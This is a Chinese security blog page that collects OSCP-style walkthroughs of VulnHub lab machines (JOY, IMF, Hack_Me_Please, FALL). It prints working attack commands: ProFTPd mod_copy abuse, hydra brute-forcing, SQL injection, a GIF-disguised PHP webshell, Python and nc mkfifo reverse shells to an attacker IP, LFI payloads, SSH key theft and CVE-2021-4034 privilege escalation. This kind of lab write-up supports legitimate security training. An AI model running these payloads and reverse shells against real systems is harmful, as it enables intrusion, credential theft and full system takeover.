首页
泷羽收录
文章合集
OSCP打靶
渗透学习
渗透工具
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,420 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,053 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,207 阅读
4
几个常见的密码字典推荐
3,228 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,165 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
Windows渗透
域渗透
HackMyVm
CyberStrikeLab靶场
内网渗透
渗透测试
Web安全
网络安全
cyberstrikelab
OSCP
SQL注入
WAF绕过
信息收集
渗透工具
靶场
靶场推荐
MSF
ThinkPHP漏洞
Vulfocus
vulnhub
白小羽
累计撰写
184
篇文章
累计收到
0
条评论
首页
导航
泷羽收录
文章合集
OSCP打靶
渗透学习
渗透工具
工具导航
留言面板
友情链接
搜索到
184
篇与
的结果
2025-05-18
JOY,ProFTPd的拷贝漏洞
【oscp】JOY,ProFTPd的拷贝漏洞下载地址:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/主机发现&端口扫描直接访问,泄露版本信息上漏洞检索,只有一个拒绝服务攻击,并不能直接getshell,切换思路端口详细扫描,发现了一个FTP匿名登录nmap -sS 10.10.10.198 -T4 -p- -A登录ftpftp 10.10.10.198 # 密码为空,直接回车看到两个可执行文件,下载下来get reminder get directory赋予执行权限(并不能直接执行)直接cat directory,看上去是用户patrick的用户目录,毕竟有一个上级目录就是root权限的信息Patrick's Directory total 132 drwxr-xr-x 18 patrick patrick 4096 Feb 4 21:20 . drwxr-xr-x 4 root root 4096 Jan 6 2019 .. -rw-r--r-- 1 patrick patrick 24 Feb 4 21:15 1kd8va0o50OV3H28HZ26ffN7JMeU0wG8J996ftHpRuQrAAQqKoxQfCs5aB8GFXC7.txt -rw-r--r-- 1 patrick patrick 24 Feb 4 20:55 6kK0S15FpM4iECwlY9vBMOcz0WHalkAEQZIHFBUDxztRq1We1v5GYxAMdxMbUba6.txt -rw-r--r-- 1 patrick patrick 0 Feb 4 21:15 aOY5oYk9g0WS0nXasU6l2EvjrFCl4hqk.txt -rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history -rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout -rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache -rw-r--r-- 1 patrick patrick 0 Feb 4 20:50 chTSFHiKgRfHiwgp8LV9u4tDwhpdGnKp.txt drwx------ 10 patrick patrick 4096 Dec 26 2018 .config drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads -rw-r--r-- 1 patrick patrick 0 Feb 4 21:20 Dp9d3TstWJP6Yczetnrx4GnQgkVE250L.txt -rw-r--r-- 1 patrick patrick 24 Feb 4 20:50 gAOnh9TLwMyOEViffEXpFAt3LcChEuxcWeqc3BPcQFIRomrGdizTYKuJlHuOSF4z.txt drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg -rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha -rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano -rw-r--r-- 1 patrick patrick 24 Feb 4 21:05 obzvvHxWWlOzg8z8uOdy2Qd94dVMZAs2glSOp18HRCRl9jqmB4x5PVoqLsqM0sAD.txt drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures -rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public -rw-r--r-- 1 patrick patrick 0 Feb 4 21:05 Q9lbdQPPywIiNT5Dagi0Bg9OMx0CQ0ts.txt d--------- 2 root root 4096 Jan 9 2019 script drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh -rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates -rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt -rw-r--r-- 1 patrick patrick 24 Feb 4 21:20 UKwKOJqE9XVI3TaEvKZJr8CWu1kVXOWTFZQqjhaiES7QydPE1KEcY2bzuLsOpnYc.txt -rw-r--r-- 1 patrick patrick 0 Feb 4 21:00 V56ziCPycMNIbNplkqYedQXlM6G9YO66.txt -rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos -rw-r--r-- 1 patrick patrick 0 Feb 4 21:10 Wp2Twcw4FWSRMYDe8mniQ1BZhHyhYHqX.txt -rw-r--r-- 1 patrick patrick 0 Feb 4 20:55 XFsA7qBE2voGAtiuZfQ0GQMxE8RitITZ.txt -rw-r--r-- 1 patrick patrick 24 Feb 4 21:10 YbxpYyx2v9VnifKxuctWG1Y3BzXp8dGJrQrlXbDHK0qp0ZcBRudy7zzN2g8Rxc9F.txt -rw-r--r-- 1 patrick patrick 24 Feb 4 21:00 YPE8Q4kbBE98OJCytjadCwhK2W9TMb5UPnCP0cHnGsS2dvpwXrppfAViwZmPH3Zq.txt You should know where the directory can be accessed. Information of this Machine! Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux另外一个reminder,目前可能用不上,有一个version_control包含了版本信息的文件┌──(root㉿kali)-[/data/demo] └─# cat reminder Lock down this machine!继续信息收集,目录扫描(没有利用方式)dirsearch -u http://10.10.10.198/ossec/这里需要利用到一个ProFTPd的拷贝漏洞,这样就能从ftp服务器上下载version_control这个版本文件了相关学习文章:https://www.freebuf.com/column/209238.html┌──(root㉿kali)-[~] └─# telnet 10.10.10.198 21 Trying 10.10.10.198... Connected to 10.10.10.198. Escape character is '^]'. 220 The Good Tech Inc. FTP Server site cpfr /home/patrick/version_control 350 File or directory exists, ready for destination name site cpto /home/ftp/upload/version_control 250 Copy successful quit 221 Goodbye. Connection closed by foreign host.此时再登录FTP服务器,就能看到多出了一个文件信息# 下载 get version_control找到服务版本了,ProFTPd,1.3.5┌──(root㉿kali)-[~] └─# cat version_control Version Control of External-Facing Services: Apache: 2.4.25 Dropbear SSH: 0.34 ProFTPd: 1.3.5 Samba: 4.5.12 We should switch to OpenSSH and upgrade ProFTPd. Note that we have some other configurations in this machine. 1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy. 2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.复制到当前目录下并执行searchsploit -m 36803 python2 36803.py执行脚本的时候它直接卡在这儿了查看脚本内容,这是一个网站的目录这个目录呢在刚刚的版本文件version_control中也有 /var/www/tryingharderisjoy.┌──(root㉿kali)-[~] └─# cat version_control Version Control of External-Facing Services: Apache: 2.4.25 Dropbear SSH: 0.34 ProFTPd: 1.3.5 Samba: 4.5.12 We should switch to OpenSSH and upgrade ProFTPd. Note that we have some other configurations in this machine. 1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy. 2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.但还是不行,MSF可以利用,这里不做过多解释,继续手动我们得知了网站的目录/var/www/tryingharderisjoy,那么就利用刚刚的文件复制漏洞命令如下┌──(root㉿kali)-[/usr/share/webshells/php] └─# telnet 10.10.10.198 21 Trying 10.10.10.198... Connected to 10.10.10.198. Escape character is '^]'. 220 The Good Tech Inc. FTP Server site cpfr /home/ftp/upload/php-reverse-shell.php 350 File or directory exists, ready for destination name site cpto /var/www/tryingharderisjoy/php-reverse-shell.php 250 Copy successful quit 221 Goodbye. Connection closed by foreign host.反弹成功开始提权,在网站根目录下面看到了patricksecretsofjoy文件包含了账号密码信息www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls -al ls -al total 116 drwxr-xr-x 8 www-data www-data 4096 Jan 6 2019 . drwxr-xr-x 3 www-data www-data 4096 Feb 4 22:41 .. -rw-r--r-- 1 www-data www-data 92 Jul 19 2016 .hgtags -rw-r--r-- 1 www-data www-data 262 Dec 28 2018 .htaccess -rw-r--r-- 1 www-data www-data 44 Dec 28 2018 .htpasswd -rwxr-xr-x 1 www-data www-data 317 Jul 19 2016 CONTRIB -rw-r--r-- 1 www-data www-data 35745 Jul 19 2016 LICENSE -rw-r--r-- 1 www-data www-data 2106 Jul 19 2016 README -rw-r--r-- 1 www-data www-data 923 Jul 19 2016 README.search drwxr-xr-x 3 www-data www-data 4096 Jul 19 2016 css -rw-r--r-- 1 www-data www-data 218 Jul 19 2016 htaccess_def.txt drwxr-xr-x 2 www-data www-data 4096 Jul 19 2016 img -rwxr-xr-x 1 www-data www-data 5177 Jul 19 2016 index.php drwxr-xr-x 2 www-data www-data 4096 Jul 19 2016 js drwxr-xr-x 3 www-data www-data 4096 Dec 28 2018 lib -rw-r--r-- 1 www-data www-data 462 Jul 19 2016 ossec_conf.php -rw-r--r-- 1 www-data www-data 134 Jan 6 2019 patricksecretsofjoy -rwxr-xr-x 1 www-data www-data 2471 Jul 19 2016 setup.sh drwxr-xr-x 2 www-data www-data 4096 Dec 28 2018 site drwxrwxrwx 2 www-data www-data 4096 Feb 4 21:32 tmp www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat .htpasswd cat .htpasswd admin:$apr1$3Jv2Ok6H$4BMdXenVBmD2E3kXe8RVL. www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy cat patricksecretsofjoy credentials for JOY: patrick:apollo098765 root:howtheheckdoiknowwhattherootpasswordis how would these hack3rs ever find such a page? www-data@JOY:/var/www/tryingharderisjoy/ossec$ su root su root Password: howtheheckdoiknowwhattherootpasswordis su: Authentication failure www-data@JOY:/var/www/tryingharderisjoy/ossec$ su patrick su patrick Password: apollo098765 patrick@JOY:/var/www/tryingharderisjoy/ossec$ whoami whoami patrick有了密码直接sudo -l,看样子可以直接利用这个test文件提权了,但是这个目录无法访问,没有权限不要忘了我们怎么进来的,这里可以利用刚刚的任意文件复制漏洞,进行复制呀cd ~ echo 'php /var/www/tryingharderisjoy/php-reverse-shell.php' > testkali┌──(root㉿kali)-[~] └─# telnet 10.10.10.198 21 Trying 10.10.10.198... Connected to 10.10.10.198. Escape character is '^]'. 220 The Good Tech Inc. FTP Server site cpfr /home/patrick/test 350 File or directory exists, ready for destination name site cpto /home/patrick/script/test 250 Copy successful quit 221 Goodbye. Connection closed by foreign host.靶机提权即可 sudo /home/patrick/script/testkali┌──(root㉿kali)-[~] └─# nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.10.128] from (UNKNOWN) [10.10.10.198] 44710 Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux 23:13:50 up 2:28, 0 users, load average: 0.04, 0.05, 0.04 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=0(root) gid=0(root) groups=0(root) /bin/sh: 0: can't access tty; job control turned off # whoami root #至此提权成功往期推荐往期推荐不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学防溯源小技巧ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略【oscp】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS【渗透测试】Linux隐身登录
2025年05月18日
1,419 阅读
0 评论
0 点赞
2025-05-18
IMF缓冲区提权渗透
IMF缓冲区提权渗透靶机地址:https://www.vulnhub.com/entry/imf-1,162/靶机难度:中级(CTF)服务端口扫描访问80端口端口服务探测,能下手的只有80端口这儿只找到一个关于,联系我们只有一个80端口,本次靶机考核的应该就不是xss,可以直接跳过下面似乎有三个用户查看源码,这儿有一个flag1{YWxsdGhlZmlsZXM=}解码看看得到明文:allthefiles网页上也没有其他东西了,用dirsearch进行目录扫描试试表面上没有任何信息了,但又肯定存在其他信息,只能对源码进行审计Place favicon.ico and apple-touch-icon.avif in the root directory将favicon.ico和appletouch -icon.avif放在根目录下直到看到这些编码信息将前面两个两个拼凑在一起ZmxhZzJ7YVcxbVlXUnRhVzVwYzNS后面的那个就普通解码,得到后半部分flag合起来就是,这里还是一个flagflag2{aW1mYWRtaW5pc3RyYXRvcg==}继续解码,imfadministrator,这个结果可能是密码信息,但是网页上并没有登录的功能,22端口也没有开启那么就是目录了这里不清楚用户名的话,还记得刚刚页面上的信息嘛,第一个是导演,第二个是副主任,第三个是参谋长先目录扫描一下,看看能不能越权不行sql注入,万能密码现在唯一没有利用上的就是第一个flag明文,可能是密码吧,allthefiles,但是也没有效果,继续查看源码I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger我无法使SQL工作,所以我硬编码了密码。还是很安全的。——罗杰这不是又是一个用户名,用户名不存在(无效的用户名),这又是一个漏洞点试试刚刚的用户(导演 rmichaels,副主任 akeith,参谋长 estone),导演为密码错误副主任 akeith 无效的用户名参谋长 estone ,不存在看样子只有导演能登陆了,用burp爆破社区版很慢,考试只能用社区版,还有啥办法嘞,可以试试 hydra ,之前都是爆破一些协议,没有对http请求的内容进行爆破,这个还真没试过,我是菜鸡分析页面信息 页面登录错误的信息为Invalid登录失败的表单数据那么就能得到hydra的参数详解hydra -l rmichaels -P /usr/share/wordlists/fasttrack.txt -t 4 -vV 192.168.209.132 http-post-form "/imfadministrator/index.php:user=^USER^&pass=^PASS^:Invalid"都失败了hydra:调用 Hydra 工具。-l rmichaels:指定单个用户名为 rmichaels。这意味着 Hydra 将使用 rmichaels 作为用户名进行所有尝试。-P /usr/share/wordlists/fasttrack.txt:指定密码字典文件为 /usr/share/wordlists/fasttrack.txt。Hydra 将从这个文件中读取密码,逐个尝试。-t 4:设置同时运行的线程数为 4。这可以提高破解效率,但同时也会增加对目标服务器的负载。-vV:显示详细的过程信息。这有助于了解 Hydra 的运行状态和尝试的用户名/密码组合。192.168.209.132:目标服务器的 IP 地址。http-post-form:指定服务类型为 HTTP POST 表单。"/imfadministrator/index.php:user=^USER^&pass=^PASS^:Invalid":指定表单路径、参数和错误消息。/imfadministrator/index.php:表单的路径。这是目标服务器上处理登录请求的 PHP 文件的路径。user=^USER^&pass=^PASS^:表单的参数。^USER^ 和 ^PASS^ 是占位符,分别表示用户名和密码。Hydra 会将这些占位符替换为实际的用户名和密码进行尝试。Invalid:错误消息。当表单返回该消息时,表示登录失败。Hydra 会根据这个错误消息来判断当前尝试的用户名和密码是否有效。使用强加密的话,可以利用php的特性,进行绕过得到了flag3flag3{Y29udGludWVUT2Ntcw==}解密后的明文:continueTOcms进入到home试试文件包含file协议data协议php://filter伪协议sql注入测试,得到sql语法错误的结果,这里没有回显数据(暂定为盲注)继续添加参数,普通的盲注是行不通的,这里要在后面再添加一个单引号我们换一个页面试试,看看能不能找到其他回显数据,进一步判断是否可以使用其他类型的注入(找其他信息,尽量不要盲注,因为在oscp考试中,禁止使用商业化工具比如sqlmap),用order by行不通看样子是利用这个pagename,回显html数据的,这里发现一个union联合查询注入当前数据库http://192.168.209.132/imfadministrator/cms.php?pagename=11111' union select concat(database())'# # admin接下来有一个很离谱的事儿,就是利用group_concat(111)能正常回显是吧,并且后面的sql语句没有报错但是我一换成table_name就完蛋啦,无奈自能用sqlmap了sqlmap脚本如下sqlmap -u 'http://192.168.209.132/imfadministrator/cms.php?pagename=disavowlist' -p 'pagename' --dbms 'mysql' --level 3 --cookie 'PHPSESSID=rcvl9o0565ni5ub2ki19i1vcu3' --dump可以看到这里是存在联合注入的访问一下,错误。。。。不管了看数据这里有一个二维码,扫扫看得到flag4,flag4{dXBsb2Fkcjk0Mi5waHA=}解码为一个php文件有一个文件上传burp抓包burp爆破文件后缀,普通的一句话木马不行,那么就需要进行绕过webshell的绕过工具weevelyweevely generate <password> <path>把木马放到windows上进行上传,尝试各种的上传方法,只有图片格式的可以上传,还需要添加文件头欺骗但是我们并不知道文件的名称,有一个uploads文件夹,刚刚dirsearch扫出来的,查看上传成功的源码,dab037ffb2eb这里访问图片只有图片马,还需要一个文件包含的漏洞才可以getshell(找个半天没有。。。),但是gif不一样了写入一句话木马echo 'GIF89a <?php $cmd=$_GET['cmd']; echo `$cmd`; ?>' > cmd.gif上传http://192.168.209.132/imfadministrator/uploads/dfd5fb101707.gif?cmd=idls 查看当前目录,发现flag5,flag5_abc123def.txtcat flag5_abc123def.txthttp://192.168.209.132/imfadministrator/uploads/dfd5fb101707.gif?cmd=cat%20flag5_abc123def.txtflag5{YWdlbnRzZXJ2aWNlcw==} # 解码 agentservices利用python3反弹shellexport RHOST="192.168.209.130";export RPORT=6666;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'系统信息收集,ubuntu 16.04 版本但是这些exp都不行,这里提权有两种方法,一个是cve-2021-4034,一个是缓冲区溢出exp提权,kaligit clone https://github.com/arthepsy/CVE-2021-4034.git靶机wget 192.168.209.130:5000/cve-2021-4034-poc.c gcc -o exp cve-2021-4034-poc.c ./exp第二种方法缓冲区溢出提权,看看参考文章吧,这里我的“敲门”服务开启端口失败了,可能是因为我用了提权脚本的问题。附两篇写的比较好的文章参考(都是缓冲区溢出的):https://www.freebuf.com/articles/system/329028.htmlhttps://blog.csdn.net/ericalezl/article/details/131797477往期推荐往期推荐不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学防溯源小技巧ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略【oscp】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录
2025年05月18日
1,307 阅读
0 评论
0 点赞
2025-05-18
Hack_Me_Please,js信息泄露,二级目录遍历
【oscp】Hack_Me_Please,js信息泄露,二级目录遍历靶机地址:https://www.vulnhub.com/entry/hack-me-please-1,731/外网打点主机发现&端口扫描80端口这是一个静态页面mysql测试是否可以远程连接(可)Tips :ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chAIn,这个错误表示客户端与服务器之间建立安全连接时出现的SSL/TLS 证书验证错误解决办法通常有两种方法: 添加参数 --skip-ssl 添加参数 --ssl-mode=DISABLED 目录扫描看到一个html,不是php写的,进行目录爆破的时候就需要用到wfuzz或者gobuster既然是静态页面,那么我们直接打开控制台,这里注释信息有一个 /seeddms51x/seeddms-5.1.22///确保这个js文件与我们服务器端点上安装的应用相同:/seeddms51x/seeddms-5.1.22/访问这个应用http://10.10.10.201/seeddms51x/seeddms-5.1.22/经过一些列折腾后' or 1=1 --+ ' or 1=1 -- + ' or 1=1# " or 1=1 --+ " or 1=1 -- + " || 1=1 -- + " || 1=1 --+ " || 1=1 #继续信息收集,发现可以对这个上级目录进行扫描gobuster dir -u http://10.10.10.201/seeddms51x -w /data/SecLists_Dict/Discovery/Web-Content/directory-list-1.0.txt -x html,txt,php,js开放了,三个目录/conf /www /pear/conf/settings.xml丢给AI总结(注意oscp考试绝对不允许使用AI)有了数据库密码,那么就远程登录┌──(root㉿kali)-[/data/demo] └─# mysql -u seeddms -h 10.10.10.201 --skip-ssl -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or g. Your MySQL connection id is 72 Server version: 8.0.25-0ubuntu0.20.04.1 (ubuntu) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Support MariaDB developers by giving a star at https://github.com/MariaDB/server Type 'help;' or 'h' for help. Type 'c' to clear the current input statement. MySQL [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | seeddms | | sys | +--------------------+ 5 rows in set (0.006 sec) MySQL [(none)]> use seeddms Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MySQL [seeddms]> show tables; +------------------------------+ | Tables_in_seeddms | +------------------------------+ | tblACLs | | tblAttributeDefinitions | | tblCategory | | tblDocumentApproveLog | ------------------------------------------- | tblWorkflowTransitions | | tblWorkflows | | users | +------------------------------+ 43 rows in set (0.002 sec) MySQL [seeddms]> select * from users; +-------------+---------------------+--------------------+-----------------+ | Employee_id | Employee_first_name | Employee_last_name | Employee_passwd | +-------------+---------------------+--------------------+-----------------+ | 1 | saket | saurav | Saket@#$1337 | +-------------+---------------------+--------------------+-----------------+ 1 row in set (0.002 sec)发现Saket@#$1337登录不成功 MySQL [seeddms]> select * from tblUsers; +----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+ | id | login | pwd | fullName | emAIl | language | theme | comment | role | hidden | pwdExpiration | loginfAIlures | disabled | quota | homefolder | +----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+ | 1 | admin | f9ef2c539bad8a6d2f3432b6d49ab51a | Administrator | address@server.com | en_GB | | | 1 | 0 | 2021-07-13 00:12:25 | 0 | 0 | 0 | NULL | | 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NULL | 0 | 0 | 0 | NULL | +----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+ 2 rows in set (0.001 sec)解密失败,那还有一种方法就是修改数据了修改密码为123456 md5加密后e10adc3949ba59abbe56e057f20f883eupdate tblUsers set pwd='e10adc3949ba59abbe56e057f20f883e' where login='admin';修改后就能登录了在mysql中还有一个信息是必须要收集的(这个配置不当能够直接getshell)MySQL [seeddms]> SHOW VARIABLES LIKE 'secure_file_priv'; +------------------+-----------------------+ | Variable_name | Value | +------------------+-----------------------+ | secure_file_priv | /var/lib/mysql-files/ | +------------------+-----------------------+ 1 row in set (0.019 sec)继续登录的后台,点击添加文档,发现能上传文件我们使用weevely生成一个php静态木马(它具有跨平台、隐蔽性好[增加免杀率]、支持多种功能等特点)weevely generate cmd shell.php把他上传上去那么这个shell路径怎么获取呢,这里可以检索一下历史漏洞,这里有一个命令执行查看一下需要获取文档ID example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd完整payload如下http://10.10.10.201/seeddms51x/data/1048576/10/1.php内网渗透使用weevely连接webshellweevely terminal http://10.10.10.201/seeddms51x/data/1048576/10/1.php cmd反弹shellrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.128 1234 >/tmp/f创建交互式终端python2 -c 'import pty; pty.spawn("/bin/bash")';内网信息收集的时候,看到一个logrotate计划任务www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/10$ ls -al /etc/cron* ls -al /etc/cron* -rw-r--r-- 1 root root 1042 Feb 13 2020 /etc/crontab /etc/cron.d: total 36 drwxr-xr-x 2 root root 4096 Jul 2 2021 . drwxr-xr-x 133 root root 12288 Jul 3 2021 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder -rw-r--r-- 1 root root 285 Jul 16 2019 anacron -rw-r--r-- 1 root root 201 Feb 13 2020 e2scrub_all -rw-r--r-- 1 root root 712 Jun 20 2021 php -rw-r--r-- 1 root root 191 Jul 2 2021 popularity-contest /etc/cron.dAIly: total 68 drwxr-xr-x 2 root root 4096 Jul 2 2021 . drwxr-xr-x 133 root root 12288 Jul 3 2021 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder -rwxr-xr-x 1 root root 311 Jul 16 2019 0anacron -rwxr-xr-x 1 root root 539 Apr 13 2020 apache2 -rwxr-xr-x 1 root root 376 Dec 4 2019 apport -rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat -rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmAInutils -rwxr-xr-x 1 root root 384 Nov 19 2019 cracklib-runtime -rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg -rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate -rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db -rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest -rwxr-xr-x 1 root root 214 Dec 7 2020 update-notifier-common www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/10$ logrotate --version logrotate --version logrotate 3.14.0 Default mAIl command: /usr/bin/mAIl Default compress command: /bin/gzip Default uncompress command: /bin/gunzip Default compress extension: .gz Default state file path: /var/lib/logrotate/status ACL support: yes SELinux support: yes很遗憾,这个利用不了,版本太新(高)了然后我想到了刚进来的那个网页moonlight,这里有一个权限提升POC为c#计算机语言,大概率不适用于Linux想想看哪里还没有利用这是之前mysql中的用户表,存在一个用户Saket@#$1337我们查看/etc/passwd,是存在这个用户的www-data@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ su saket su saket Password: Saket@#$1337 To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for detAIls. saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ sudo -l sudo -l [sudo] password for saket: Saket@#$1337 Matching Defaults entries for saket on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin User saket may run the following commands on ubuntu: (ALL : ALL) ALL saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ sudo -i sudo -i root@ubuntu:~# whoami whoami root至此提权成功。往期推荐往期推荐不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学防溯源小技巧ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略【oscp】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS【渗透测试】Linux隐身登录
2025年05月18日
1,048 阅读
0 评论
0 点赞
2025-05-18
FALL,wfuzz对参数的模糊测试
【oscp】FALL,wfuzz对参数的模糊测试靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-fall,726/连接好kali,主机发现 & 端口扫描,发现了两个http服务,一个是80端口一个9090端口这是80界面这是9090界面随便点点,文件包含伪协议如下(利用失败)php://filter/read=convert.base64-encode/resource=index.php php://filter/resource=index.php php://filter/string.strip_tags|convert.base64-decode/resource=shell.php data://text/plain,<?php%20phpinfo();?> data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b file:///etc/passwd http://127.0.0.1/cmd.php?cmd=php://input POST数据:<?php phpinfo()?>看到网站底部,2.2.15版本漏洞检索,但是需要鉴权我们并没有登录后台这里看到一个用户发送的一个消息,留着有一个后门接下来进行目录扫描,发现有一个test.phpdirsearch -u http://10.10.10.199利用wfuzz工具,对参数进行爆破,并筛选出响应长度在100到100000之间的结果wfuzz -u http://10.10.10.200/test.php?FUZZ=/etc/passwd -w /data/SecLists_Dict/Discovery/Web-Content/small_common.txt --ss "^(.{100,100000})$"此时发现有一个file参数,访问payload,并发现写那篇文章的qiu用户,curl http://10.10.10.200/test.php?file=/etc/passwd查看是否存在id_rsa,这个文件呢是私匙,在linux中它非常的敏感,如果用户泄露了此文件,那么攻击者就可以利用此文件免密登录服务器,通过下面的命令,可以看到目标服务器泄露了此用户的文件curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa确保私钥文件的权限被严格限制。通常,私钥文件的权限应设置为 600(只有所有者可以读写),否则可能利用不成功。curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa > qiu chmod 600 qiu ssh qiu@10.10.10.200 -i qiu登录成功后,进行内网信息收集,外网还有一个9090端口的web,那么就来看数据库配置,密码为P@ssw0rdINSANITY查看表数据mysql> select * from cms_users -> ; +---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+ | user_id | username | password | admin_access | first_name | last_name | email | active | create_date | modified_date | +---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+ | 1 | qiu | bc8b9059c13582d649d3d9e48c16d67f | 1 | qiu qing | chan | qiu@goodtech.inc | 1 | 2021-05-21 17:06:29 | 2021-05-22 02:28:53 | | 2 | patrick | 6aea70cc6a678f0f83a82e1c753d7764 | 1 | Patrick | Ong | patrick@goodtech.inc | 1 | 2021-05-22 02:28:33 | 2021-05-22 16:54:13 | +---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+ 2 rows in set (0.00 sec)解密失败基本信息收集uname -a hostname # 主机名 # 系统信息相关 lsb_release -a cat /etc/os-release cat /proc/version # 权限相关 sudo -l # 查看可以使用sudo的文件 find / -perm -4000 -print 2>/dev/null # 查找 SUID文件 ls -al /etc/cron* # 查看所有计划任务 find / -perm 777 -type f 2>/dev/null # 查看文件权限为777的文件信息 # 其他信息收集 ps -aux netstat -tulnp history 直到历史命令测试sudo,提权成功(之前的mysql服务器密码也可以尝试)往期推荐不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学防溯源小技巧ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略【oscp】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录
2025年05月18日
1,409 阅读
0 评论
0 点赞
2025-05-18
BSides-Vancouver-2018-Workshop,ftp匿名登录,wordpress渗透
